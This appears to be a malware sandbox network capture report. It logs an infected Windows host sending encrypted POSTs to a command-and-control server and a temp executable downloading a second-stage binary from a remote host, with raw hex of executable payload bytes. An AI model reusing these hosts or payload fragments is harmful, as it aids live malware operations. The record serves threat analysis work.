                                                                                              May 25, 2024 21:29:34.545523882 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 9c 5f d0 02 e8 38 03 00 00 68 f6 f2 40 00 e8 53 18 00 00 59 c3 b9 a0 5f d0 02 e8 34 03 00 00
                                                                                              Data Ascii: _8h@SY_4h@=Y_0h@'Yj_Ej_8j_+j_3twQUYuH3tUUUwkP3Yu&U
                                                                                              May 25, 2024 21:29:34.553687096 CEST1236INData Raw: 56 57 6a 01 8d 45 ff 8b f9 50 e8 ea 01 00 00 8b c8 e8 78 03 00 00 83 7d 08 00 8b f0 75 06 89 75 08 89 75 0c 8d 45 08 8b ce 50 e8 c7 02 00 00 8b c8 e8 82 fc ff ff 50 8d 45 ff 8b cf 50 e8 b7 01 00 00 8b c8 e8 2e fd ff ff 8d 45 0c 8b ce 50 e8 a5 02
                                                                                              Data Ascii: VWjEPx}uuuEPPEP.EP]PEP_^]@H(SVuWe};su'3EOu;vW+4;veFPEP ]4EM
                                                                                              May 25, 2024 21:29:34.553700924 CEST1236INData Raw: ff 8b 18 89 30 8b 37 8b ce e8 17 fe ff ff 89 30 83 67 04 00 3b 1f 74 17 8b cb e8 03 fe ff ff 53 8b cf 8b 30 e8 e0 fc ff ff 8b de 3b 37 75 e9 5f 5e 5b c3 55 8b ec 83 7d 10 00 75 05 8b 45 08 5d c3 5d e9 c3 0e 00 00 e9 05 00 00 00 e9 0d 00 00 00 ff
                                                                                              Data Ascii: 070g;tS0;7u_^[U}uE]]t$gYt$ZYUuYtMPuxE]Qt$L$cD$UQeEE]@%#4U3VUA8q Fr
                                                                                              May 25, 2024 21:29:34.560971022 CEST864INData Raw: 45 08 8b e5 5d c2 08 00 55 8b ec 51 83 65 fc 00 83 7d 0c 01 75 0f 8b 4d 08 68 2c 04 41 00 e8 86 f4 ff ff eb 0b ff 75 0c ff 75 08 e8 ab ff ff ff 8b 45 08 8b e5 5d c2 08 00 55 8b ec 51 ff 75 0c 83 65 fc 00 e8 07 08 00 00 59 85 c0 b9 f4 03 41 00 0f
                                                                                              Data Ascii: E]UQe}uMh,AuuE]UQueYAEQMLE]U}uE]]A A`AUQVWEPMP6_^]A)_Pd$SL$UV\$,D$ W{D$4F
                                                                                              May 25, 2024 21:29:34.655028105 CEST1236INData Raw: bc 60 f5 1c 51 c7 45 b8 72 ef e8 00 c7 45 9c 1e 71 54 1a c7 45 b0 f1 f7 35 5a c7 45 94 ed 5d 7d 01 c7 85 70 ff ff ff c1 df bc 6d c7 45 c0 60 6b f1 32 c7 45 c4 45 25 6f 73 c7 45 ac 6c 19 18 72 c7 45 a8 3f 3c 6c 2d c7 45 c8 f7 fc 27 11 c7 45 a0 47
                                                                                              Data Ascii: `QErEqTE5ZE]}pmE`k2EE%osElrE?<l-E'EGiE$ESiE26YE9Yx+t9MeEETT2mEpmkE"Umz&i>EV\dm;YE-ik"teEmTADE8*@zeE8Y<6eE
                                                                                              May 25, 2024 21:29:34.657352924 CEST1236INData Raw: 00 74 10 8b 4d 08 39 08 74 0d 83 c0 08 83 78 04 00 75 f3 33 c0 5d c3 8b 40 04 5d c3 55 8b ec 83 3d ec 04 41 00 00 b8 e8 04 41 00 74 10 8b 4d 08 39 08 74 0d 83 c0 08 83 78 04 00 75 f3 33 c0 5d c3 8b 40 04 5d c3 ff 35 d0 5f d0 02 ff 15 94 00 41 00
                                                                                              Data Ascii: tM9txu3]@]U=AAtM9txu3]@]5_AtjjdYY|UuNYtuYt]jEEAPMhhdAEEAP;Vjj "YYVAPLujX^&3^jhPeA
                                                                                              May 25, 2024 21:29:34.661200047 CEST1236INData Raw: 40 00 94 2b 40 00 8c 2b 40 00 84 2b 40 00 7c 2b 40 00 74 2b 40 00 6c 2b 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc
                                                                                              Data Ascii: @+@+@+@|+@t+@l+@DDDDDDDDDDDDDD$+@+@+@+@+@D$^_D$^_FGD$^_IFGFGD$^_t1|9u$r$T-@$-@I
                                                                                              May 25, 2024 21:29:34.665553093 CEST1236INData Raw: ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 cc cc cc cc cc 57 56 8b 74 24 10 8b 4c 24 14 8b 7c 24 0c 8b c1 8b d1 03 c6 3b fe 76 08
                                                                                              Data Ascii: ttAL$+AL$+AL$+AL$+WVt$L$|$;v;h%`s3u%J%`svs~vftcf
                                                                                              May 25, 2024 21:29:34.665564060 CEST1236INData Raw: 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 34 35 40 00 8b ff 44 35 40 00 4c 35 40 00 5c 35 40 00 70 35 40 00 8b 44 24 0c 5e 5f c3 90
                                                                                              Data Ascii: DDDDDDDDD$45@D5@L5@\5@p5@D$^_FGD$^_IFGFGD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pf
                                                                                              May 25, 2024 21:29:34.673690081 CEST1236INData Raw: b6 c0 0f be 80 10 a4 4a 00 03 c8 41 85 ff 75 d1 8d 85 fc ef ff ff 2b f0 8d 04 31 e9 72 01 00 00 8b bd f0 ef ff ff 8b 04 bd 20 60 d0 02 8b bd d8 ef ff ff f6 44 01 04 80 8b 85 f4 ef ff ff 74 19 8b 95 e4 ef ff ff eb 07 80 3a 0a 75 01 47 42 3b d6 72
                                                                                              Data Ascii: JAu+1r `Dt:uGB;ru .u!9Xu+ppj `[DjS;u?B+J;B


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.449745158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:36.317305088 CEST283OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://cmovmgvridjjk.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 355
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:36.317392111 CEST355OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 9b 66 5d 02 c9 a1 c1 64 15 da a2 35
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d5xrllRL#$8_kIYv14UlsRe|el2~4:.<GCVYI<b4T{d1;N+rx3*ueamlURs8@B\k;6G
                                                                                              May 25, 2024 21:29:37.062428951 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:36 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.449747158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:37.086112976 CEST283OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://uopmqrlryhqym.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 178
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:37.086112976 CEST178OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 98 66 5d 02 c8 a1 c1 64 27 b5 d1 37
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d'7Axt5cHU=)r@:TllN=A*W~Q dd_?&+:;XQvIB$lmx=
                                                                                              May 25, 2024 21:29:37.940068007 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:37 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.449748158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:37.997029066 CEST281OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://kdrrcifvupv.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 283
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:37.997049093 CEST283OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 99 66 5d 02 c8 a1 c1 64 17 da b5 07
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d+z?GfO65]dB^OZeBF/HC5;:w/p((2U(gW<C28(r6/!sMDTd&VAda61u|nkJ
                                                                                              May 25, 2024 21:29:38.724839926 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:38 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.449749158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:38.780399084 CEST284OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://froejfbfqcabvk.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 123
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:38.780457020 CEST123OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 96 66 5d 02 c8 a1 c1 64 5a a9 92 6b
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]dZkZdh^&_g3s}05n("H
                                                                                              May 25, 2024 21:29:39.499422073 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:39 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.449750158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:39.561779976 CEST286OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://ijjaoopskaipyfot.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 199
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:39.561814070 CEST199OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 97 66 5d 02 c8 a1 c1 64 14 9a af 03
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d;jEaLh4Z\-_m~&bUxJIR"2XzO<>iVY$<TF\wyy3#|xj"@lm/[1
                                                                                              May 25, 2024 21:29:40.299617052 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:40 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.449752158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:40.316894054 CEST282OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://qlrqehiwqptv.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 329
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:40.316912889 CEST329OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 94 66 5d 02 c8 a1 c1 64 01 d5 b8 29
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d)<^9P!{uB^}Z.ocK{$8'at?]2bW]-)T,TBJL\Q*5{$~RYo1^h0x<;wjZqKciP:R$
                                                                                              May 25, 2024 21:29:41.079699039 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:40 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.449753158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:41.129514933 CEST282OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://jkukpjjesbti.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 280
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:41.135246992 CEST280OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 95 66 5d 02 c8 a1 c1 64 28 a2 80 66
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d(f:Gd@4N_,LCN >W6j!zZBBJKu-GQ2f^`R)mZ.A9poEJ9ggW}4JtOMd"Fh[,
                                                                                              May 25, 2024 21:29:41.987983942 CEST236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:41 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 33 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 90 51 10 25 01 f1 a0 89 b3 bf 05 ab 11 df 76 be 59 51 96 01 bf ea 26 ed 65 5e 12 b3 f2 92 4a f5 04 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 35I:82OQ%vYQ&e^J0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.449754189.163.126.89802764C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:41.205625057 CEST91OUTGET /dl/build2.exe HTTP/1.1
                                                                                              User-Agent: Microsoft Internet Explorer
                                                                                              Host: sdfjhuz.com
                                                                                              May 25, 2024 21:29:42.380868912 CEST1236INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Sat, 25 May 2024 19:29:42 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 232448
                                                                                              Last-Modified: Wed, 22 May 2024 09:20:03 GMT
                                                                                              Connection: close
                                                                                              ETag: "664db8c3-38c00"
                                                                                              Accept-Ranges: bytes
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 14 2a 8b 75 75 44 d8 75 75 44 d8 75 75 44 d8 78 27 9b d8 6d 75 44 d8 78 27 a4 d8 03 75 44 d8 78 27 a5 d8 52 75 44 d8 7c 0d d7 d8 72 75 44 d8 75 75 45 d8 11 75 44 d8 c0 eb a1 d8 74 75 44 d8 78 27 9f d8 74 75 44 d8 c0 eb 9a d8 74 75 44 d8 52 69 63 68 75 75 44 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8f f9 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 dc 00 00 00 18 88 02 00 00 00 00 7f 36 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 89 02 00 04 00 00 5c 36 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1*uuDuuDuuDx'muDx'uDx'RuD|ruDuuEuDtuDx'tuDtuDRichuuDPEL_e6@\6PP(wQ`F@\.text `.rdatahj@@.data@ `J@.rsrc(wx@@
                                                                                              May 25, 2024 21:29:42.382752895 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 54 6f c8 02 e8 e9 01 00 00 68 a9 ea 40 00 e8 74 22 00 00 59 c3 b9 5c 6f c8 02 e8 3c 02 00 00
                                                                                              Data Ascii: Toh@t"Y\o<h@^"YHoh@H"YjPojDo|jXoojLobUE]UE8u3]PY]U}uE]]U}uE]
                                                                                              May 25, 2024 21:29:42.387357950 CEST1236INData Raw: d3 e8 89 45 f4 8b 45 dc 01 45 f4 8b 45 f4 33 45 f8 31 45 fc 8b 45 fc 29 45 ec 8d 4d f0 e8 a9 fe ff ff 4f 74 0b 8b 5d f0 8b 4d d8 e9 fe fe ff ff 8b 7d d0 8b 45 ec 89 77 04 89 07 5f 5e 5b 8b e5 5d c3 56 8b 35 38 6f c8 02 c1 ee 03 57 8b 3d c4 69 c8
                                                                                              Data Ascii: EEEE3E1EE)EMOt]M}Ew_^[]V58oW=it{Nu_^UQeEEi]U0SV3W=(@S8q Fr|8osAKQS<o8o8@MiQj@58oP
                                                                                              May 25, 2024 21:29:42.387393951 CEST1236INData Raw: 65 f0 8b 45 f0 b8 3c 82 2d 6d f7 65 dc 8b 45 dc 81 6d f8 8f f8 a0 2f 81 6d d0 7c 01 a6 42 81 45 f0 2b d2 04 5f 81 45 fc f4 60 30 0f 81 45 e4 50 dd de 4d b8 27 de f0 22 f7 65 e8 8b 45 e8 b8 c8 66 70 6d f7 65 bc 8b 45 bc 81 45 dc 85 45 ad 41 81 6d
                                                                                              Data Ascii: eE<-meEm/m|BE+_E`0EPM'"eEfpmeEEEAmeACj02eEeEojeEEqEE-SlfeEmDoxm_9Rmw4mTem{mP-36}WWWWW@WWWH@[aFp|=8o
                                                                                              May 25, 2024 21:29:42.398611069 CEST864INData Raw: e8 a2 01 00 00 8b c8 8b c1 c3 55 8b ec 51 8d 45 ff 50 e8 01 fe ff ff 8b c8 e8 4e 01 00 00 33 d2 42 3b c2 8d 48 ff 0f 46 ca 8b c1 8b e5 5d c3 b8 70 ea 40 00 e8 c9 cb 00 00 83 ec 14 53 56 8b 75 08 57 8b f9 89 65 f0 89 7d e4 83 ce 0f e8 b8 ff ff ff
                                                                                              Data Ascii: UQEPN3B;HF]p@SVuWe};su'3EOu;vW+4;veFPEPM]8EME@ePEEPTE@M}u]}vuPS
                                                                                              May 25, 2024 21:29:42.492794037 CEST1236INData Raw: 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 10 6a 01 8d 45 fc c7 45 fc cc ff 40 00 50 8d 4d f0 e8 fb 19 00 00 68 3c 4b 41 00 8d 45 f0 c7 45 f0 c4 ff 40 00 50 e8 b7 14 00 00 cc 55 8b ec 83 ec 0c 8b 45 08 8d 4d f4 89 45 08 8d 45 08 50 e8 a8 19 00 00 68 ac
                                                                                              Data Ascii: ^]UjEE@PMh<KAEE@PUEMEEPhKAEE@PUEMEEPzhKAEE@P[WVt$L$|$;v;h%)Cs3u%`A%)C
